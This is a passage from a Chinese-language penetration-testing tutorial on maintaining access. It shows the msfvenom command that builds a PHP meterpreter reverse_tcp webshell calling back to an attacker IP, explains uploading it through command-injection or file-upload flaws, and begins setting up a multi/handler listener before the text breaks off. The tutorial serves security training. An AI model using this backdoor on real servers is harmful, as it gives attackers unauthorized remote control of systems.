27、渗透测试中的访问维持与文档报告

渗透测试中的访问维持与文档报告

1. PHP Meterpreter的使用

在渗透测试中，Metasploit提供了PHP meterpreter有效载荷，借助此模块，能够创建具备meterpreter功能的PHP WebShell。可以利用命令注入和文件上传等漏洞将该Shell上传到目标服务器。

创建PHP meterpreter的步骤如下：
使用Metasploit的msfvenom工具，执行以下命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.23 -f raw > php-meter.php

命令参数说明：
- -p ：指定有效载荷（php/meterpreter/reverse_tcp）
- -f ：指定输出格式（raw）
- LHOST ：攻击机的IP地址

生成的PHP meterpreter会存储在 php-meter.php 文件中。在将此后门发送到目标之前，需移除第一行的注释符号。

之后，要准备好处理该PHP meterpreter。在本地机器上启动Metasploit控制台（msfconsole），并使用 multi/handler 漏洞利用模块。接着，使用与生成Shell后门时相同的 php/meterpreter/reverse_tcp